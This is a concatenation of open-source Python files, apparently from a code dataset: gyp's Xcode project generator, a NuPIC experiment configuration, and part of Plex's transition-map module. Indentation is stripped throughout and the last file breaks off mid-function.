os.umask(umask)
os.chmod(new_pbxproj_path, 0666 & ~umask)
os.rename(new_pbxproj_path, pbxproj_path)
except Exception:
# Don't leave turds behind. In fact, if this code was responsible for
# creating the xcodeproj directory, get rid of that too.
os.unlink(new_pbxproj_path)
if self.created_dir:
shutil.rmtree(self.path, True)
raise
def AddSourceToTarget(source, type, pbxp, xct):
# TODO(mark): Perhaps source_extensions and library_extensions can be made a
# little bit fancier.
source_extensions = ['c', 'cc', 'cpp', 'cxx', 'm', 'mm', 's']
# .o is conceptually more of a "source" than a "library," but Xcode thinks
# of "sources" as things to compile and "libraries" (or "frameworks") as
# things to link with. Adding an object file to an Xcode target's frameworks
# phase works properly.
library_extensions = ['a', 'dylib', 'framework', 'o']
basename = posixpath.basename(source)
(root, ext) = posixpath.splitext(basename)
if ext:
ext = ext[1:].lower()
if ext in source_extensions and type != 'none':
xct.SourcesPhase().AddFile(source)
elif ext in library_extensions and type != 'none':
xct.FrameworksPhase().AddFile(source)
else:
# Files that aren't added to a sources or frameworks build phase can still
# go into the project file, just not as part of a build phase.
pbxp.AddOrGetFileInRootGroup(source)
def AddResourceToTarget(resource, pbxp, xct):
# TODO(mark): Combine with AddSourceToTarget above? Or just inline this call
# where it's used.
xct.ResourcesPhase().AddFile(resource)
def AddHeaderToTarget(header, pbxp, xct, is_public):
# TODO(mark): Combine with AddSourceToTarget above? Or just inline this call
# where it's used.
settings = '{ATTRIBUTES = (%s, ); }' % ('Private', 'Public')[is_public]
xct.HeadersPhase().AddFile(header, settings)
_xcode_variable_re = re.compile('(\$\((.*?)\))')
def ExpandXcodeVariables(string, expansions):
"""Expands Xcode-style $(VARIABLES) in string per the expansions dict.
In some rare cases, it is appropriate to expand Xcode variables when a
project file is generated. For any substring $(VAR) in string, if VAR is a
key in the expansions dict, $(VAR) will be replaced with expansions[VAR].
Any $(VAR) substring in string for which VAR is not a key in the expansions
dict will remain in the returned string.
"""
matches = _xcode_variable_re.findall(string)
  if matches is None:
return string
matches.reverse()
for match in matches:
(to_replace, variable) = match
    if variable not in expansions:
continue
replacement = expansions[variable]
string = re.sub(re.escape(to_replace), replacement, string)
return string
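# Example (hypothetical values):
#   ExpandXcodeVariables('$(SRCROOT)/gen/$(UNKNOWN)', {'SRCROOT': '/proj'})
# returns '/proj/gen/$(UNKNOWN)'; variables missing from the expansions
# dict are left untouched, per the docstring above.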
_xcode_define_re = re.compile(r'([\\\"\' ])')
def EscapeXcodeDefine(s):
"""We must escape the defines that we give to XCode so that it knows not to
split on spaces and to respect backslash and quote literals. However, we
must not quote the define, or Xcode will incorrectly intepret variables
especially $(inherited)."""
return re.sub(_xcode_define_re, r'\\\1', s)
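# Example: EscapeXcodeDefine('NAME="foo bar"') yields NAME=\"foo\ bar\"
# (quotes and the space become backslash-escaped literals).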
def PerformBuild(data, configurations, params):
options = params['options']
for build_file, build_file_dict in data.iteritems():
(build_file_root, build_file_ext) = os.path.splitext(build_file)
if build_file_ext != '.gyp':
continue
xcodeproj_path = build_file_root + options.suffix + '.xcodeproj'
if options.generator_output:
xcodeproj_path = os.path.join(options.generator_output, xcodeproj_path)
for config in configurations:
arguments = ['xcodebuild', '-project', xcodeproj_path]
arguments += ['-configuration', config]
print "Building [%s]: %s" % (config, arguments)
subprocess.check_call(arguments)
def GenerateOutput(target_list, target_dicts, data, params):
options = params['options']
generator_flags = params.get('generator_flags', {})
parallel_builds = generator_flags.get('xcode_parallel_builds', True)
serialize_all_tests = \
generator_flags.get('xcode_serialize_all_test_runs', True)
project_version = generator_flags.get('xcode_project_version', None)
skip_excluded_files = \
not generator_flags.get('xcode_list_excluded_files', True)
xcode_projects = {}
for build_file, build_file_dict in data.iteritems():
(build_file_root, build_file_ext) = os.path.splitext(build_file)
if build_file_ext != '.gyp':
continue
xcodeproj_path = build_file_root + options.suffix + '.xcodeproj'
if options.generator_output:
xcodeproj_path = os.path.join(options.generator_output, xcodeproj_path)
xcp = XcodeProject(build_file, xcodeproj_path, build_file_dict)
xcode_projects[build_file] = xcp
pbxp = xcp.project
if parallel_builds:
pbxp.SetProperty('attributes',
{'BuildIndependentTargetsInParallel': 'YES'})
if project_version:
xcp.project_file.SetXcodeVersion(project_version)
# Add gyp/gypi files to project
if not generator_flags.get('standalone'):
main_group = pbxp.GetProperty('mainGroup')
build_group = gyp.xcodeproj_file.PBXGroup({'name': 'Build'})
main_group.AppendChild(build_group)
for included_file in build_file_dict['included_files']:
build_group.AddOrGetFileByPath(included_file, False)
xcode_targets = {}
xcode_target_to_target_dict = {}
for qualified_target in target_list:
[build_file, target_name, toolset] = \
gyp.common.ParseQualifiedTarget(qualified_target)
spec = target_dicts[qualified_target]
if spec['toolset'] != 'target':
raise Exception(
'Multiple toolsets not supported in xcode build (target %s)' %
qualified_target)
configuration_names = [spec['default_configuration']]
for configuration_name in sorted(spec['configurations'].keys()):
if configuration_name not in configuration_names:
configuration_names.append(configuration_name)
xcp = xcode_projects[build_file]
pbxp = xcp.project
# Set up the configurations for the target according to the list of names
# supplied.
xccl = CreateXCConfigurationList(configuration_names)
# Create an XCTarget subclass object for the target. The type with
# "+bundle" appended will be used if the target has "mac_bundle" set.
# loadable_modules not in a mac_bundle are mapped to
# com.googlecode.gyp.xcode.bundle, a pseudo-type that xcode.py interprets
# to create a single-file mh_bundle.
_types = {
'executable': 'com.apple.product-type.tool',
'loadable_module': 'com.googlecode.gyp.xcode.bundle',
'shared_library': 'com.apple.product-type.library.dynamic',
'static_library': 'com.apple.product-type.library.static',
'executable+bundle': 'com.apple.product-type.application',
'loadable_module+bundle': 'com.apple.product-type.bundle',
'loadable_module+xctest': 'com.apple.product-type.bundle.unit-test',
'shared_library+bundle': 'com.apple.product-type.framework',
}
target_properties = {
'buildConfigurationList': xccl,
'name': target_name,
}
type = spec['type']
is_xctest = int(spec.get('mac_xctest_bundle', 0))
is_bundle = int(spec.get('mac_bundle', 0)) or is_xctest
if type != 'none':
type_bundle_key = type
if is_xctest:
type_bundle_key += '+xctest'
assert type == 'loadable_module', (
'mac_xctest_bundle targets must have type loadable_module '
'(target %s)' % target_name)
elif is_bundle:
type_bundle_key += '+bundle'
xctarget_type = gyp.xcodeproj_file.PBXNativeTarget
try:
target_properties['productType'] = _types[type_bundle_key]
except KeyError, e:
gyp.common.ExceptionAppend(e, "-- unknown product type while "
"writing target %s" % target_name)
raise
else:
xctarget_type = gyp.xcodeproj_file.PBXAggregateTarget
assert not is_bundle, (
'mac_bundle targets cannot have type none (target "%s")' %
target_name)
assert not is_xctest, (
'mac_xctest_bundle targets cannot have type none (target "%s")' %
target_name)
target_product_name = spec.get('product_name')
if target_product_name is not None:
target_properties['productName'] = target_product_name
xct = xctarget_type(target_properties, parent=pbxp,
force_outdir=spec.get('product_dir'),
force_prefix=spec.get('product_prefix'),
force_extension=spec.get('product_extension'))
pbxp.AppendProperty('targets', xct)
xcode_targets[qualified_target] = xct
xcode_target_to_target_dict[xct] = spec
spec_actions = spec.get('actions', [])
spec_rules = spec.get('rules', [])
# Xcode has some "issues" with checking dependencies for the "Compile
# sources" step with any source files/headers generated by actions/rules.
# To work around this, if a target is building anything directly (not
# type "none"), then a second target is used to run the GYP actions/rules
# and is made a dependency of this target. This way the work is done
# before the dependency checks for what should be recompiled.
support_xct = None
if type != 'none' and (spec_actions or spec_rules):
      support_xccl = CreateXCConfigurationList(configuration_names)
support_target_properties = {
'buildConfigurationList': support_xccl,
'name': target_name + ' Support',
}
if target_product_name:
support_target_properties['productName'] = \
target_product_name + ' Support'
support_xct = \
gyp.xcodeproj_file.PBXAggregateTarget(support_target_properties,
parent=pbxp)
pbxp.AppendProperty('targets', support_xct)
xct.AddDependency(support_xct)
# Hang the support target off the main target so it can be tested/found
# by the generator during Finalize.
xct.support_target = support_xct
prebuild_index = 0
# Add custom shell script phases for "actions" sections.
for action in spec_actions:
# There's no need to write anything into the script to ensure that the
# output directories already exist, because Xcode will look at the
# declared outputs and automatically ensure that they exist for us.
# Do we have a message to print when this action runs?
message = action.get('message')
if message:
message = 'echo note: ' + gyp.common.EncodePOSIXShellArgument(message)
else:
message = ''
# Turn the list into a string that can be passed to a shell.
action_string = gyp.common.EncodePOSIXShellList(action['action'])
# Convert Xcode-type variable references to sh-compatible environment
# variable references.
message_sh = gyp.xcodeproj_file.ConvertVariablesToShellSyntax(message)
action_string_sh = gyp.xcodeproj_file.ConvertVariablesToShellSyntax(
action_string)
script = ''
# Include the optional message
if message_sh:
script += message_sh + '\n'
# Be sure the script runs in exec, and that if exec fails, the script
# exits signalling an error.
script += 'exec ' + action_string_sh + '\nexit 1\n'
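      # For a hypothetical action ['python', 'gen.py', 'out.h'] with message
      # "Gen", the assembled script would read (illustrative sketch only):
      #   echo note: Gen
      #   exec python gen.py out.h
      #   exit 1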
ssbp = gyp.xcodeproj_file.PBXShellScriptBuildPhase({
'inputPaths': action['inputs'],
'name': 'Action "' + action['action_name'] + '"',
'outputPaths': action['outputs'],
'shellScript': script,
'showEnvVarsInLog': 0,
})
if support_xct:
support_xct.AppendProperty('buildPhases', ssbp)
else:
# TODO(mark): this assumes too much knowledge of the internals of
# xcodeproj_file; some of these smarts should move into xcodeproj_file
# itself.
xct._properties['buildPhases'].insert(prebuild_index, ssbp)
prebuild_index = prebuild_index + 1
# TODO(mark): Should verify that at most one of these is specified.
if int(action.get('process_outputs_as_sources', False)):
for output in action['outputs']:
AddSourceToTarget(output, type, pbxp, xct)
if int(action.get('process_outputs_as_mac_bundle_resources', False)):
for output in action['outputs']:
AddResourceToTarget(output, pbxp, xct)
# tgt_mac_bundle_resources holds the list of bundle resources so
# the rule processing can check against it.
if is_bundle:
tgt_mac_bundle_resources = spec.get('mac_bundle_resources', [])
else:
tgt_mac_bundle_resources = []
# Add custom shell script phases driving "make" for "rules" sections.
#
# Xcode's built-in rule support is almost powerful enough to use directly,
# but there are a few significant deficiencies that render them unusable.
# There are workarounds for some of its inadequacies, but in aggregate,
# the workarounds added complexity to the generator, and some workarounds
# actually require input files to be crafted more carefully than I'd like.
# Consequently, until Xcode rules are made more capable, "rules" input
# sections will be handled in Xcode output by shell script build phases
# performed prior to the compilation phase.
#
# The following problems with Xcode rules were found. The numbers are
    # Apple radar IDs. I hope that these shortcomings are addressed; I really
# liked having the rules handled directly in Xcode during the period that
# I was prototyping this.
#
# 6588600 Xcode compiles custom script rule outputs too soon, compilation
# fails. This occurs when rule outputs from distinct inputs are
# interdependent. The only workaround is to put rules and their
# inputs in a separate target from the one that compiles the rule
# outputs. This requires input file cooperation and it means that
# process_outputs_as_sources is unusable.
# 6584932 Need to declare that custom rule outputs should be excluded from
# compilation. A possible workaround is to lie to Xcode about a
# rule's output, giving it a dummy file it doesn't know how to
# compile. The rule action script would need to touch the dummy.
# 6584839 I need a way to declare additional inputs to a custom rule.
# A possible workaround is a shell script phase prior to
# compilation that touches a rule's primary input files if any
# would-be additional inputs are newer than the output. Modifying
# the source tree - even just modification times - feels dirty.
# 6564240 Xcode "custom script" build rules always dump all environment
    # variables. This is a low-priority problem and is not a
# show-stopper.
rules_by_ext = {}
for rule in spec_rules:
rules_by_ext[rule['extension']] = rule
# First, some definitions:
#
# A "rule source" is a file that was listed in a target's "sources"
# list and will have a rule applied to it on the basis of matching the
# rule's "extensions" attribute. Rule sources are direct inputs to
# rules.
#
# Rule definitions may specify additional inputs in their "inputs"
# attribute. These additional inputs are used for dependency tracking
# purposes.
#
# A "concrete output" is a rule output with input-dependent variables
# resolved. For example, given a rule with:
# 'extension': 'ext', 'outputs': ['$(INPUT_FILE_BASE).cc'],
# if the target's "sources" list contained "one.ext" and "two.ext",
# the "concrete output" for rule input "two.ext" would be "two.cc". If
# a rule specifies multiple outputs, each input file that the rule is
# applied to will have the same number of concrete outputs.
#
# If any concrete outputs are outdated or missing relative to their
# corresponding rule_source or to any specified additional input, the
# rule action must be performed to generate the concrete outputs.
# concrete_outputs_by_rule_source will have an item at the same index
# as the rule['rule_sources'] that it corresponds to. Each item is a
# list of all of the concrete outputs for the rule_source.
concrete_outputs_by_rule_source = []
# concrete_outputs_all is a flat list of all concrete outputs that this
# rule is able to produce, given the known set of input files
# (rule_sources) that apply to it.
concrete_outputs_all = []
# messages & actions are keyed by the same indices as rule['rule_sources']
# and concrete_outputs_by_rule_source. They contain the message and
# action to perform after resolving input-dependent variables. The
# message is optional, in which case None is stored for each rule source.
messages = []
actions = []
for rule_source in rule.get('rule_sources', []):
rule_source_dirname, rule_source_basename = \
posixpath.split(rule_source)
(rule_source_root, rule_source_ext) = \
posixpath.splitext(rule_source_basename)
# These are the same variable names that Xcode uses for its own native
# rule support. Because Xcode's rule engine is not being used, they
# need to be expanded as they are written to the makefile.
rule_input_dict = {
'INPUT_FILE_BASE': rule_source_root,
'INPUT_FILE_SUFFIX': rule_source_ext,
'INPUT_FILE_NAME': rule_source_basename,
'INPUT_FILE_PATH': rule_source,
'INPUT_FILE_DIRNAME': rule_source_dirname,
}
concrete_outputs_for_this_rule_source = []
for output in rule.get('outputs', []):
# Fortunately, Xcode and make both use $(VAR) format for their
# variables, so the expansion is the only transformation necessary.
          # Any remaining $(VAR)-type variables in the string can be given
# directly to make, which will pick up the correct settings from
# what Xcode puts into the environment.
concrete_output = ExpandXcodeVariables(output, rule_input_dict)
concrete_outputs_for_this_rule_source.append(concrete_output)
# Add all concrete outputs to the project.
pbxp.AddOrGetFileInRootGroup(concrete_output)
concrete_outputs_by_rule_source.append( \
concrete_outputs_for_this_rule_source)
concrete_outputs_all.extend(concrete_outputs_for_this_rule_source)
# TODO(mark): Should verify that at most one of these is specified.
if int(rule.get('process_outputs_as_sources', False)):
for output in concrete_outputs_for_this_rule_source:
AddSourceToTarget(output, type, pbxp, xct)
# If the file came from the mac_bundle_resources list or if the rule
# is marked to process outputs as bundle resource, do so.
was_mac_bundle_resource = rule_source in tgt_mac_bundle_resources
if was_mac_bundle_resource or \
int(rule.get('process_outputs_as_mac_bundle_resources', False)):
for output in concrete_outputs_for_this_rule_source:
AddResourceToTarget(output, pbxp, xct)
# Do we have a message to print when this rule runs?
message = rule.get('message')
if message:
message = gyp.common.EncodePOSIXShellArgument(message)
message = ExpandXcodeVariables(message, rule_input_dict)
messages.append(message)
# Turn the list into a string that can be passed to a shell.
action_string = gyp.common.EncodePOSIXShellList(rule['action'])
action = ExpandXcodeVariables(action_string, rule_input_dict)
actions.append(action)
if len(concrete_outputs_all) > 0:
        # TODO(mark): There's a possibility for collision here. Consider
# target "t" rule "A_r" and target "t_A" rule "r".
makefile_name = '%s.make' % re.sub(
'[^a-zA-Z0-9_]', '_' , '%s_%s' % (target_name, rule['rule_name']))
makefile_path = os.path.join(xcode_projects[build_file].path,
makefile_name)
# TODO(mark): try/close? Write to a temporary file and swap it only
# if it's got changes?
makefile = open(makefile_path, 'wb')
# make will build the first target in the makefile by default. By
# convention, it's called "all". List all (or at least one)
# concrete output for each rule source as a prerequisite of the "all"
# target.
makefile.write('all: \\\n')
for concrete_output_index in \
xrange(0, len(concrete_outputs_by_rule_source)):
# Only list the first (index [0]) concrete output of each input
# in the "all" target. Otherwise, a parallel make (-j > 1) would
# attempt to process each input multiple times simultaneously.
# Otherwise, "all" could just contain the entire list of
# concrete_outputs_all.
concrete_output = \
concrete_outputs_by_rule_source[concrete_output_index][0]
if concrete_output_index == len(concrete_outputs_by_rule_source) - 1:
eol = ''
else:
eol = ' \\'
makefile.write(' %s%s\n' % (concrete_output, eol))
for (rule_source, concrete_outputs, message, action) in \
zip(rule['rule_sources'], concrete_outputs_by_rule_source,
messages, actions):
makefile.write('\n')
# Add a rule that declares it can build each concrete output of a
# rule source. Collect the names of the directories that are
# required.
concrete_output_dirs = []
for concrete_output_index in xrange(0, len(concrete_outputs)):
concrete_output = concrete_outputs[concrete_output_index]
if concrete_output_index == 0:
bol = ''
else:
bol = ' '
makefile.write('%s%s \\\n' % (bol, concrete_output))
concrete_output_dir = posixpath.dirname(concrete_output)
if (concrete_output_dir and
concrete_output_dir not in concrete_output_dirs):
concrete_output_dirs.append(concrete_output_dir)
makefile.write(' : \\\n')
# The prerequisites for this rule are the rule source itself and
# the set of additional rule inputs, if any.
prerequisites = [rule_source]
prerequisites.extend(rule.get('inputs', []))
for prerequisite_index in xrange(0, len(prerequisites)):
prerequisite = prerequisites[prerequisite_index]
if prerequisite_index == len(prerequisites) - 1:
eol = ''
else:
eol = ' \\'
makefile.write(' %s%s\n' % (prerequisite, eol))
# Make sure that output directories exist before executing the rule
# action.
if len(concrete_output_dirs) > 0:
makefile.write('\t@mkdir -p "%s"\n' %
'" "'.join(concrete_output_dirs))
# The rule message and action have already had the necessary variable
# substitutions performed.
if message:
# Mark it with note: so Xcode picks it up in build output.
makefile.write('\t@echo note: %s\n' % message)
makefile.write('\t%s\n' % action)
makefile.close()
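        # The makefile written above has roughly this shape (an illustrative
        # sketch for a hypothetical rule turning one.ext into gen/one.cc;
        # recipe lines are tab-indented):
        #
        #   all: \
        #       gen/one.cc
        #
        #   gen/one.cc \
        #       : \
        #       one.ext
        #       @mkdir -p "gen"
        #       @echo note: processing one.ext
        #       process one.ext gen/one.cc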
# It might be nice to ensure that needed output directories exist
# here rather than in each target in the Makefile, but that wouldn't
# work if there ever was a concrete output that had an input-dependent
# variable anywhere other than in the leaf position.
# Don't declare any inputPaths or outputPaths. If they're present,
# Xcode will provide a slight optimization by only running the script
# phase if any output is missing or outdated relative to any input.
# Unfortunately, it will also assume that all outputs are touched by
# the script, and if the outputs serve as files in a compilation
# phase, they will be unconditionally rebuilt. Since make might not
# rebuild everything that could be declared here as an output, this
# extra compilation activity is unnecessary. With inputPaths and
# outputPaths not supplied, make will always be called, but it knows
# enough to not do anything when everything is up-to-date.
# To help speed things up, pass -j COUNT to make so it does some work
# in parallel. Don't use ncpus because Xcode will build ncpus targets
# in parallel and if each target happens to have a rules step, there
# would be ncpus^2 things going. With a machine that has 2 quad-core
# Xeons, a build can quickly run out of processes based on
# scheduling/other tasks, and randomly failing builds are no good.
script = \
"""JOB_COUNT="$(/usr/sbin/sysctl -n hw.ncpu)"
if [ "${JOB_COUNT}" -gt 4 ]; then
JOB_COUNT=4
fi
exec xcrun make -f "${PROJECT_FILE_PATH}/%s" -j "${JOB_COUNT}"
exit 1
""" % makefile_name
ssbp = gyp.xcodeproj_file.PBXShellScriptBuildPhase({
'name': 'Rule "' + rule['rule_name'] + '"',
'shellScript': script,
'showEnvVarsInLog': 0,
})
if support_xct:
support_xct.AppendProperty('buildPhases', ssbp)
else:
# TODO(mark): this assumes too much knowledge of the internals of
# xcodeproj_file; some of these smarts should move into xcodeproj_file
# itself.
xct._properties['buildPhases'].insert(prebuild_index, ssbp)
prebuild_index = prebuild_index + 1
# Extra rule inputs also go into the project file. Concrete outputs were
# already added when they were computed.
groups = ['inputs', 'inputs_excluded']
if skip_excluded_files:
groups = [x for x in groups if not x.endswith('_excluded')]
for group in groups:
for item in rule.get(group, []):
pbxp.AddOrGetFileInRootGroup(item)
# Add "sources".
for source in spec.get('sources', []):
(source_root, source_extension) = posixpath.splitext(source)
if source_extension[1:] not in rules_by_ext:
# AddSourceToTarget will add the file to a root group if it's not
# already there.
AddSourceToTarget(source, type, pbxp, xct)
else:
pbxp.AddOrGetFileInRootGroup(source)
# Add "mac_bundle_resources" and "mac_framework_private_headers" if
# it's a bundle of any type.
if is_bundle:
for resource in tgt_mac_bundle_resources:
(resource_root, resource_extension) = posixpath.splitext(resource)
if resource_extension[1:] not in rules_by_ext:
AddResourceToTarget(resource, pbxp, xct)
else:
pbxp.AddOrGetFileInRootGroup(resource)
for header in spec.get('mac_framework_private_headers', []):
AddHeaderToTarget(header, pbxp, xct, False)
# Add "mac_framework_headers". These can be valid for both frameworks
# and static libraries.
if is_bundle or type == 'static_library':
for header in spec.get('mac_framework_headers', []):
AddHeaderToTarget(header, pbxp, xct, True)
# Add "copies".
pbxcp_dict = {}
for copy_group in spec.get('copies', []):
dest = copy_group['destination']
if dest[0] not in ('/', '$'):
# Relative paths are relative to $(SRCROOT).
dest = '$(SRCROOT)/' + dest
# Coalesce multiple "copies" sections in the same target with the same
# "destination" property into the same PBXCopyFilesBuildPhase, otherwise
# they'll wind up with ID collisions.
pbxcp = pbxcp_dict.get(dest, None)
if pbxcp is None:
pbxcp = gyp.xcodeproj_file.PBXCopyFilesBuildPhase({
'name': 'Copy to ' + copy_group['destination']
},
parent=xct)
pbxcp.SetDestination(dest)
# TODO(mark): The usual comment about this knowing too much about
# gyp.xcodeproj_file internals applies.
xct._properties['buildPhases'].insert(prebuild_index, pbxcp)
pbxcp_dict[dest] = pbxcp
for file in copy_group['files']:
pbxcp.AddFile(file)
# Excluded files can also go into the project file.
if not skip_excluded_files:
for key in ['sources', 'mac_bundle_resources', 'mac_framework_headers',
'mac_framework_private_headers']:
excluded_key = key + '_excluded'
for item in spec.get(excluded_key, []):
pbxp.AddOrGetFileInRootGroup(item)
# So can "inputs" and "outputs" sections of "actions" groups.
groups = ['inputs', 'inputs_excluded', 'outputs', 'outputs_excluded']
if skip_excluded_files:
groups = [x for x in groups if not x.endswith('_excluded')]
for action in spec.get('actions', []):
for group in groups:
for item in action.get(group, []):
# Exclude anything in BUILT_PRODUCTS_DIR. They're products, not
# sources.
if not item.startswith('$(BUILT_PRODUCTS_DIR)/'):
pbxp.AddOrGetFileInRootGroup(item)
for postbuild in spec.get('postbuilds', []):
action_string_sh = gyp.common.EncodePOSIXShellList(postbuild['action'])
script = 'exec ' + action_string_sh + '\nexit 1\n'
# Make the postbuild step depend on the output of ld or ar from this
# target. Apparently putting the script step after the link step isn't
# sufficient to ensure proper ordering in all cases. With an input
# declared but no outputs, the script step should run every time, as
# desired.
ssbp = gyp.xcodeproj_file.PBXShellScriptBuildPhase({
'inputPaths': ['$(BUILT_PRODUCTS_DIR)/$(EXECUTABLE_PATH)'],
'name': 'Postbuild "' + postbuild['postbuild_name'] + '"',
'shellScript': script,
'showEnvVarsInLog': 0,
})
xct.AppendProperty('buildPhases', ssbp)
# Add dependencies before libraries, because adding a dependency may imply
# adding a library. It's preferable to keep dependencies listed first
# during a link phase so that they can override symbols that would
# otherwise be provided by libraries, which will usually include system
# libraries. On some systems, ld is finicky and even requires the
# libraries to be ordered in such a way that unresolved symbols in
# earlier-listed libraries may only be resolved by later-listed libraries.
# The Mac linker doesn't work that way, but other platforms do, and so
# their linker invocations need to be constructed in this way. There's
# no compelling reason for Xcode's linker invocations to differ.
if 'dependencies' in spec:
for dependency in spec['dependencies']:
xct.AddDependency(xcode_targets[dependency])
# The support project also gets the dependencies (in case they are
# needed for the actions/rules to work).
if support_xct:
support_xct.AddDependency(xcode_targets[dependency])
if 'libraries' in spec:
for library in spec['libraries']:
xct.FrameworksPhase().AddFile(library)
# Add the library's directory to LIBRARY_SEARCH_PATHS if necessary.
# I wish Xcode handled this automatically.
library_dir = posixpath.dirname(library)
if library_dir not in xcode_standard_library_dirs and (
not xct.HasBuildSetting(_library_search_paths_var) or
library_dir not in xct.GetBuildSetting(_library_search_paths_var)):
xct.AppendBuildSetting(_library_search_paths_var, library_dir)
for configuration_name in configuration_names:
configuration = spec['configurations'][configuration_name]
xcbc = xct.ConfigurationNamed(configuration_name)
for include_dir in configuration.get('mac_framework_dirs', []):
xcbc.AppendBuildSetting('FRAMEWORK_SEARCH_PATHS', include_dir)
for include_dir in configuration.get('include_dirs', []):
xcbc.AppendBuildSetting('HEADER_SEARCH_PATHS', include_dir)
for library_dir in configuration.get('library_dirs', []):
if library_dir not in xcode_standard_library_dirs and (
not xcbc.HasBuildSetting(_library_search_paths_var) or
library_dir not in xcbc.GetBuildSetting(_library_search_paths_var)):
xcbc.AppendBuildSetting(_library_search_paths_var, library_dir)
if 'defines' in configuration:
for define in configuration['defines']:
set_define = EscapeXcodeDefine(define)
xcbc.AppendBuildSetting('GCC_PREPROCESSOR_DEFINITIONS', set_define)
if 'xcode_settings' in configuration:
for xck, xcv in configuration['xcode_settings'].iteritems():
xcbc.SetBuildSetting(xck, xcv)
if 'xcode_config_file' in configuration:
config_ref = pbxp.AddOrGetFileInRootGroup(
configuration['xcode_config_file'])
xcbc.SetBaseConfiguration(config_ref)
build_files = []
for build_file, build_file_dict in data.iteritems():
if build_file.endswith('.gyp'):
build_files.append(build_file)
for build_file in build_files:
xcode_projects[build_file].Finalize1(xcode_targets, serialize_all_tests)
for build_file in build_files:
xcode_projects[build_file].Finalize2(xcode_targets,
xcode_target_to_target_dict)
for build_file in build_files:
xcode_projects[build_file].Write()
|
pulinagrawal/nupic
|
refs/heads/master
|
examples/opf/experiments/classification/scalar_TP_0/description.py
|
2
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
## This file defines parameters for a prediction experiment.
import os
from nupic.frameworks.opf.expdescriptionhelpers import importBaseDescription
# the sub-experiment configuration
config = \
{ 'claEvalClassification': True,
'dataSource': 'file://' + os.path.join(os.path.dirname(__file__),
'../datasets/scalar_TP_0.csv'),
'modelParams': { 'clParams': { 'verbosity': 0},
'sensorParams': { 'encoders': { }, 'verbosity': 0},
'spParams': { },
'tmEnable': True,
'tmParams': { }}}
mod = importBaseDescription('../base_scalar/description.py', config)
locals().update(mod.__dict__)
|
ardekantur/pyglet
|
refs/heads/master
|
contrib/layout/layout/Plex/Transitions.py
|
30
|
#
# Plex - Transition Maps
#
# This version represents state sets directly as dicts
# for speed.
#
from copy import copy
import string
from sys import maxint
from types import TupleType
class TransitionMap:
"""
A TransitionMap maps an input event to a set of states.
An input event is one of: a range of character codes,
the empty string (representing an epsilon move), or one
of the special symbols BOL, EOL, EOF.
For characters, this implementation compactly represents
the map by means of a list:
[code_0, states_0, code_1, states_1, code_2, states_2,
..., code_n-1, states_n-1, code_n]
where |code_i| is a character code, and |states_i| is a
set of states corresponding to characters with codes |c|
in the range |code_i| <= |c| <= |code_i+1|.
The following invariants hold:
n >= 1
code_0 == -maxint
code_n == maxint
code_i < code_i+1 for i in 0..n-1
states_0 == states_n-1
Mappings for the special events '', BOL, EOL, EOF are
kept separately in a dictionary.
"""
map = None # The list of codes and states
special = None # Mapping for special events
def __init__(self, map = None, special = None):
if not map:
map = [-maxint, {}, maxint]
if not special:
special = {}
self.map = map
self.special = special
#self.check() ###
def add(self, event, new_state,
TupleType = TupleType):
"""
Add transition to |new_state| on |event|.
"""
if type(event) == TupleType:
code0, code1 = event
i = self.split(code0)
j = self.split(code1)
map = self.map
while i < j:
map[i + 1][new_state] = 1
i = i + 2
else:
self.get_special(event)[new_state] = 1
def add_set(self, event, new_set,
TupleType = TupleType):
"""
Add transitions to the states in |new_set| on |event|.
"""
if type(event) == TupleType:
code0, code1 = event
i = self.split(code0)
j = self.split(code1)
map = self.map
while i < j:
map[i + 1].update(new_set)
i = i + 2
else:
self.get_special(event).update(new_set)
def get_epsilon(self,
none = None):
"""
Return the mapping for epsilon, or None.
"""
return self.special.get('', none)
def items(self,
len = len):
"""
Return the mapping as a list of ((code1, code2), state_set) and
(special_event, state_set) pairs.
"""
result = []
map = self.map
else_set = map[1]
i = 0
n = len(map) - 1
code0 = map[0]
while i < n:
set = map[i + 1]
code1 = map[i + 2]
if set or else_set:
result.append(((code0, code1), set))
code0 = code1
i = i + 2
for event, set in self.special.items():
if set:
result.append((event, set))
return result
# ------------------- Private methods --------------------
def split(self, code,
len = len, maxint = maxint):
"""
Search the list for the position of the split point for |code|,
inserting a new split point if necessary. Returns index |i| such
that |code| == |map[i]|.
"""
# We use a funky variation on binary search.
map = self.map
hi = len(map) - 1
# Special case: code == map[-1]
if code == maxint:
return hi
# General case
lo = 0
# loop invariant: map[lo] <= code < map[hi] and hi - lo >= 2
while hi - lo >= 4:
# Find midpoint truncated to even index
mid = ((lo + hi) / 2) & ~1
if code < map[mid]:
hi = mid
else:
lo = mid
# map[lo] <= code < map[hi] and hi - lo == 2
if map[lo] == code:
return lo
else:
map[hi:hi] = [code, map[hi - 1].copy()]
#self.check() ###
return hi
def get_special(self, event):
"""
Get state set for special event, adding a new entry if necessary.
"""
special = self.special
set = special.get(event, None)
if not set:
set = {}
special[event] = set
return set
# --------------------- Conversion methods -----------------------
def __str__(self):
map_strs = []
map = self.map
n = len(map)
i = 0
while i < n:
code = map[i]
if code == -maxint:
code_str = "-inf"
elif code == maxint:
code_str = "inf"
else:
code_str = str(code)
map_strs.append(code_str)
i = i + 1
if i < n:
map_strs.append(state_set_str(map[i]))
i = i + 1
special_strs = {}
for event, set in self.special.items():
special_strs[event] = state_set_str(set)
return "[%s]+%s" % (
string.join(map_strs, ","),
special_strs
)
# --------------------- Debugging methods -----------------------
def check(self):
"""Check data structure integrity."""
if not self.map[-3] < self.map[-1]:
print self
assert 0
def dump(self, file):
map = self.map
i = 0
n = len(map) - 1
while i < n:
self.dump_range(map[i], map[i + 2], map[i + 1], file)
i = i + 2
for event, set in self.special.items():
if set:
if not event:
event = 'empty'
self.dump_trans(event, set, file)
def dump_range(self, code0, code1, set, file):
if set:
if code0 == -maxint:
if code1 == maxint:
k = "any"
else:
k = "< %s" % self.dump_char(code1)
elif code1 == maxint:
k = "> %s" % self.dump_char(code0 - 1)
